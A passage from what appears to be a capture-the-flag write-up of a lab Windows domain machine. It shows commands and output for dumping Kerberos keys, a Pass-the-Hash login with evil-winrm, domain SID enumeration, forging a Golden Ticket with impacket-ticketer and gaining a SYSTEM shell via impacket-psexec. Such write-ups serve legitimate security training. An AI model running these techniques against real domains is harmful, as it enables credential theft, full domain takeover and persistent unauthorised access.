administrator.htbalexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htbemma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htbemma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htbemma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

Domain Admin

Finally, we can leverage a Pass-the-Hash (PtH) attack to authenticate as the Domain Administrator on the domain controller.

Terminal window
croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
[sudo] password for croc:


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments>

root.txt

Terminal window
*Evil-WinRM* PS C:UsersAdministratorDesktop> cat root.txt
f2ef42************************

Post Root

Golden Ticket

I wanted to delve deeper into the box by exploring some persistence techniques. I decided to give the Golden Ticket a shot! That’s when my friend/mentor, 0xCOFFEE, came to my rescue. The following note from him really helped me achieve this.

notes.benheater.com favicon
Pass the Ticket | 0xBEN | Notes
notes.benheater.com

Prerequisites

In order to generate a Golden Ticket, we require the following two things:

  1. Krbtgt AES Key
  2. Domain SID

Note that, we already have the AES Key for the krbtgt account from the DCSync Attack we just performed above.

Step 01 - Domain SID

I used impacket-lookupsid along with the administrator account in order to dump the Domain SID:

Terminal window
croc@hacker:~$ impacket-lookupsid -hashes 'aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e' 'administrator.htb/administrator@10.10.11.42'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies


[*] Brute forcing SIDs at 10.10.11.42
[*] StringBinding ncacn_np:10.10.11.42[pipelsarpc]
[*] Domain SID is: S-1-5-21-1088858960-373806567-254189436
498: ADMINISTRATOREnterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMINISTRATORAdministrator (SidTypeUser)
501: ADMINISTRATORGuest (SidTypeUser)
502: ADMINISTRATORkrbtgt (SidTypeUser)
512: ADMINISTRATORDomain Admins (SidTypeGroup)
513: ADMINISTRATORDomain Users (SidTypeGroup)
514: ADMINISTRATORDomain Guests (SidTypeGroup)
515: ADMINISTRATORDomain Computers (SidTypeGroup)
516: ADMINISTRATORDomain Controllers (SidTypeGroup)
517: ADMINISTRATORCert Publishers (SidTypeAlias)
518: ADMINISTRATORSchema Admins (SidTypeGroup)
519: ADMINISTRATOREnterprise Admins (SidTypeGroup)
520: ADMINISTRATORGroup Policy Creator Owners (SidTypeGroup)
521: ADMINISTRATORRead-only Domain Controllers (SidTypeGroup)

Step 02 - Generate the Ticket

Further, I used the impacket-ticketer to generate the ticket:

Terminal window
croc@hacker:~$ impacket-ticketer -aesKey 'aadb89e07c87bcaf9c540940fab4af94' -domain-sid 'S-1-5-21-1088858960-373806567-254189436' -domain 'administrator.htb' -dc-ip '10.10.11.42' -user-id '500' 'Administrator'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies


[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for administrator.htb/Administrator
[*]   PAC_LOGON_INFO
[*]   PAC_CLIENT_INFO_TYPE
[*]   EncTicketPart
[*]   EncAsRepPart
[*] Signing/Encrypting final ticket
[*]   PAC_SERVER_CHECKSUM
[*]   PAC_PRIVSVR_CHECKSUM
[*]   EncTicketPart
[*]   EncASRepPart
[*] Saving ticket in Administrator.ccache

Here,

-aesKeySpecifies the AES Key for the krbtgt account
-domain-sidSpecifies the Domain SID
-user-idSpecifies the Administrator RID

Step 03 - Test Out!

While specifying the KRB5CCNAME environment variable equal to the ticket we just generated, I used psexec to get remote access as the administrator user and it worked flawlessly!

Terminal window
croc@hacker:~$ KRB5CCNAME=Administrator.ccache faketime "$(ntpdate -q dc.administrator.htb | cut -d ' ' -f 1,2)" impacket-psexec -k -no-pass -dc-ip 10.10.11.42 'administrator.htb/administrator@DC.administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies


[*] Requesting shares on DC.administrator.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YwxhjLVC.exe
[*] Opening SVCManager on DC.administrator.htb.....
[*] Creating service oZXF on DC.administrator.htb.....
[*] Starting service oZXF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.


C:Windowssystem32> whoami
nt authoritysystem